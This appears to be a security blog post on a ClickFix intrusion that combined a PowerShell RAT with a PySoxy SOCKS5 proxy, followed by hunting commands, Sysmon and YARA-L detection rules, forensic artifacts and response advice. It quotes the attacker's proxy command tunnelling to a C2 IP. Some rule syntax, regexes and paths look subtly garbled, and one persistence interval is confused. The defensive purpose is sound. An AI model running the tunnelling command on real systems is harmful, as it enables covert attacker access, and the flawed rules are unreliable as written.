Listen to this Post
Introduction:
Attackers are no longer relying on a single callback channel. In a recent ClickFix intrusion, adversaries deployed a PowerShell RAT with three‑second polling and a redundant PySoxy encrypted SOCKS5 proxy, creating two independent access paths before defenders could react. This highlights a critical gap: blocking a C2 channel is not containment when scheduled tasks keep re‑executing malicious payloads for hours.
Learning Objectives:
- Understand how attackers combine in‑memory PowerShell agents with compiled Python bytecode for redundant C2 channels.
- Learn to detect PySoxy execution patterns using YARA‑L rules and process monitoring.
- Master persistence hunting techniques on Windows, including scheduled task enumeration and forensic artifact analysis.
You Should Know:
- The Anatomy of a Redundant C2 Chain: PowerShell + PySoxy
The ClickFix campaign established two separate backdoors. First, a scheduled task launched an in‑memory PowerShell agent that polled a C2 server every three seconds. Second, the attacker staged compiled Python bytecode (b64.pyc) inside `C:\ProgramData` and executed it with:
python.exe b64.pyc -ssl -remote_port 443 -remote_ip <C2_IP>
This command runs a SOCKS5 proxy (PySoxy) with SSL encryption, listening on port 443 and tunnelling traffic to the attacker’s IP. The use of `.pyc` instead of `.py` bypasses some file‑scanning heuristics because the code is already byte‑compiled.
Detection signal: Look for `python.exe` spawning with arguments containing -ssl, -remote_port, and `-remote_ip` simultaneously. This combination is rare in legitimate environments.
Step‑by‑step hunting on Windows:
- Collect PowerShell logs (Event ID 4104 for script block logging):
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | Where-Object {$_.Message -match "polling|C2|scheduled"} - Enumerate running Python processes with command line details:
Get-WmiObject Win32_Process -Filter "Name='python.exe'" | Select-Object CommandLine
- Use Sysmon Event ID 1 (process creation) to detect `python.exe` with the three flags:
<Rule name="PySoxy_Execution" groupRelation="and"> <Image condition="end with">python.exe</Image> <CommandLine condition="contains">-ssl</CommandLine> <CommandLine condition="contains">-remote_port</CommandLine> <CommandLine condition="contains">-remote_ip</CommandLine> </Rule>
2. Scheduled Task Persistence – The Undying Foothold
The attacker used `schtasks` to create a task that re‑executed the PowerShell agent every few minutes. Even after the C2 channel was blocked, the task kept firing, allowing the actor to reintroduce proxy tooling once the channel reopened.
Verify existing scheduled tasks (Windows):
schtasks /query /fo LIST /v | findstr /i "clickfix updater security"
Or use PowerShell:
Get-ScheduledTask | Where-Object {$_.State -ne "Disabled"} | Get-ScheduledTaskInfo | Select-Object TaskName, LastRunTime, NextRunTime
Manual removal:
schtasks /delete /tn "MaliciousTaskName" /f
Linux equivalent (for cross‑platform awareness): Attackers often use cron or systemd timers. List user crontabs:
crontab -l Check system-wide cron ls -la /etc/cron
Mitigation: Enable PowerShell logging via Group Policy (Computer Configuration -> Administrative Templates -> Windows Components -> Windows PowerShell -> Turn on PowerShell Script Block Logging). Regularly audit scheduled tasks using tools like Autoruns from Sysinternals.
- Detecting PySoxy with YARA‑L – A Practical Rule Walkthrough
The published YARA‑L rule (link: https://lnkd.in/gzDw8Pnx) detects Python executing `.pyc` files with the three specific flags. Here is a simplified version you can test in a lab:
rule PySoxy_Proxy_Execution {
meta:
description = "Detects python.exe running compiled PySoxy with SSL and remote flags"
author = "detections.ai"
strings:
$cmd1 = "-ssl" ascii wide
$cmd2 = "-remote_port" ascii wide
$cmd3 = "-remote_ip" ascii wide
$pyc = ".pyc" ascii wide
condition:
(any of ($cmd)) and $pyc and process_name("python.exe")
}
How to deploy YARA‑L in a SIEM (e.g., Chronicle, Splunk):
1. Convert the rule to your SIEM’s detection language.
2. In Splunk, use `index=windows sourcetype=WinEventLog:Security EventCode=4688` (process creation) and regex for CommandLine=".python\.exe.-ssl.-remote_port.-remote_ip.".
3. For EDRs like CrowdStrike or Defender for Endpoint, create a custom detection using process creation events.
False positive handling: Legitimate PySoxy usage by red teams or network engineers. Whitelist known internal IPs or add an exception for specific parent processes (e.g., `setup.exe` from authorized software).
- Forensic Artifacts: Where to Find PySoxy and PowerShell Remnants
After containment, collect these artifacts to reconstruct the attack:
File system:
– `C:\ProgramData\.pyc` – look for unusual sizes or creation times matching the intrusion window.
– `%APPDATA%\Microsoft\Windows\Recent\` – recent file references to the staged bytecode.
Registry (for scheduled task persistence beyond schtasks):
reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks
Memory forensics: If you have a memory dump, use Volatility 3 with the `windows.cmdline.CmdLine` plugin to scan for the suspicious Python command line.
PowerShell transcription logs (if enabled): Located at %SystemRoot%\System32\WindowsPowerShell\v1.0\Transcripts\. Look for transcripts created at the same time as the scheduled task.
- Cloud and API Security Lessons from the Redundant Proxy Approach
Though this attack targeted endpoints, the same principle applies to cloud environments. Attackers increasingly deploy redundant API backdoors (e.g., two separate Lambda functions or API keys) to maintain access.
Hardening checklist:
- Implement API gateway rate limiting and anomalous traffic detection (e.g., SOCKS5 tunnelling to cloud metadata endpoints).
- Use VPC flow logs to detect outbound connections to rare IPs on port 443 that are not typical HTTPS.
- For AWS, enable GuardDuty’s “Pentesting” findings – protocols like SOCKS5 over unexpected ports trigger alerts.
Linux command to detect outbound SOCKS5 proxies on a cloud VM:
netstat -tunap | grep "443.ESTABLISHED" | grep python
Combine with `lsof -i :443` to see which process owns the tunnel.
- Blocked Callback Is Not Containment – Building a True Response Plan
The critical lesson from the ReliaQuest research (https://lnkd.in/g7vQTDmE) is that endpoint controls blocked both C2 channels, yet the scheduled task kept re‑executing. Defenders stopped investigating after the first blocked PowerShell callback, missing the proxy and persistence.
Response playbook addition:
- Upon blocking an outbound IP, immediately enumerate scheduled tasks and startup items on the affected host.
- Capture a full memory dump before rebooting – the PySoxy proxy may be running only in memory.
- Hunt for alternate processes (Python, Perl, Node.js) that could be tunnelling traffic.
- Use network logs to look for beaconing patterns to other IPs on port 443, even if the primary C2 was blocked.
Automated command to list all non‑Microsoft scheduled tasks remotely (PowerShell):
Invoke-Command -ComputerName target_host -ScriptBlock { Get-ScheduledTask | Where-Object {$_.TaskPath -notlike "Microsoft"} | Select-Object TaskName, State }
What Undercode Say:
- Key Takeaway 1: Attackers are weaponizing simple, old tools (PySoxy is 10+ years old) in new ways – `.pyc` execution and redundant proxies. Signature‑based tools miss these unless you monitor command‑line arguments.
- Key Takeaway 2: Persistence outlives blocking. A scheduled task that re‑executes a payload every three seconds gives an attacker unlimited retries. Your incident response must include persistence hunting even after the C2 channel appears dead.
Analysis: The ClickFix campaign demonstrates a shift toward operational redundancy. Rather than deploying one sophisticated backdoor, adversaries build multiple simple, noisy, but independent access paths. Defenders need to combine process creation monitoring, scheduled task audits, and network anomaly detection. The use of compiled Python bytecode bypasses many application control policies that only block `.exe` or `.ps1` files. Training courses on “Living off the Land” (LotL) techniques must now include Python bytecode execution as a first‑class vector. Organizations should implement “blocked callback” playbooks that trigger full host investigations, not just IP reconfiguration. The YARA‑L rule provided by detections.ai is a solid start, but false positives will occur – don’t let that stop you. Finally, this attack highlights why endpoint detection and response (EDR) products need to parse command lines for logical flag combinations, not just static strings.
Prediction:
Within the next 12 months, we will see a surge in attacks using multiple redundant C2 protocols (e.g., WebSocket + DNS tunnel + SOCKS5) deployed via scheduled tasks on Windows and cron on Linux. As AI‑based detection improves on single‑channel anomalies, attackers will shift to “channel hopping” and proxy chaining. Cloud workloads will become prime targets because they often lack scheduled task visibility. Expect vendors to release “persistence score” metrics, and incident response retainer agreements will add specific financial penalties for missed scheduled tasks. The ClickFix playbook will be adopted by ransomware groups to ensure backup proxies stay alive while the main C2 is being mitigated, leading to double‑extortion even after initial shutdown.
▶️ Related Video (78% Match):
https://www.youtube.com/watch?v=3l5btGWh4pM
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Tcp Sec – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
